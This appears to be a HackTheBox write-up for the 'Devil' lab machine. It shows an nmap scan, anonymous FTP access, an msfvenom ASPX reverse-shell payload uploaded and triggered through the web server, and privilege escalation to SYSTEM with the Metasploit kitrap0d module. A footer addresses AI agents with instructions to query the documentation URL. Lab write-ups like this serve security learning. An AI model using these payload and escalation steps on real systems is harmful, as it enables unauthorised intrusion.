# Devil HTB

**Hello brothers, here I will explain how I hacked the Devil machine on the HTB platform. It only took me 10 minutes.**

* First step: I scanned the machine with nmap and used the arg -sV to get the versions of open ports. Here are the results: 

  <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2FosoWEP1TDbvBpGRgNta2%2F1.png?alt=media&#x26;token=56020e21-38f1-4a0f-8ebb-1bf2e817d1a7" alt=""><figcaption></figcaption></figure>

  * After the scan, I found 2 open ports, HTTP and FTP.  ,, lets take a look for that

  <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2FOjCsiBnd16NMI1J5XyCY%2Fimage.png?alt=media&#x26;token=cdd25121-da85-4164-a128-66f5d30506b1" alt="" width="375"><figcaption><p>it seems </p></figcaption></figure>

* I attempted to check if I could log in as an anonymous user to the FTP server.

  <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2FNc0oLCxilB4NiUHXxIsj%2F2.png?alt=media&#x26;token=869caeb6-a3e3-46a6-8832-c7db429575a4" alt=""><figcaption></figcaption></figure>

* I successfully logged in, and I discovered that every file here can be accessed from the site. Now, let's proceed to create our payload and access it from the browser to get a reverse shell. I used the following payload:&#x20;

* i use this payload :  **`msfvenom -p windows/meterpreter/reverse_tcp lhost=<listen_ip> lport=<lisetn_port> -f aspx -o reverse.aspx`**

* then we make alot of steps :&#x20;

  * upload our shell to ftp server with command : **put reverse.aspx**
  * setup listner with msfconsole : **`use exploit/multi/handler`** and put our ip and port to recieve shell&#x20;
  * Accessed the shell from the browser : **\<machine\_ip/reverse.aspx>**

* With these steps, I gained access to the Devil machine.

  <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2FBjzitiOdnBVoMgfeDD4W%2F6.png?alt=media&#x26;token=ccec6ef6-e73d-4f5a-8e9b-a8eb7b12aa6a" alt=""><figcaption></figcaption></figure>

* Now, the next objective is to elevate privileges using my favorite module : **`run post/multi/recon/local_exploit_suggester`**

* It generated many results, and I tried a few, but none worked. Finally, I tried the following: **`use exploit/windows/local/ms10_015_kitrap0d`**  and work success

  <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2F6a1pOMMg4wOGr1mJp2FF%2F7.png?alt=media&#x26;token=aa34f62b-89f5-4231-b061-71c93ee9d702" alt=""><figcaption></figcaption></figure>

* it worked successfully, granting me the privileges of NT AUTHORITY\SYSTEM.

  <figure><img src="https://2140186435-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpoPpsF6DyQtOrXy70rxC%2Fuploads%2Fqz3bJrSdSlo1FG65aUk8%2F8.png?alt=media&#x26;token=7d7878e3-ba67-4c7e-8c34-e185033e7d06" alt=""><figcaption></figcaption></figure>

* The next step is to find the flags using your preferred method.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kero0x1.gitbook.io/general/htb-writeups/devil-htb.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.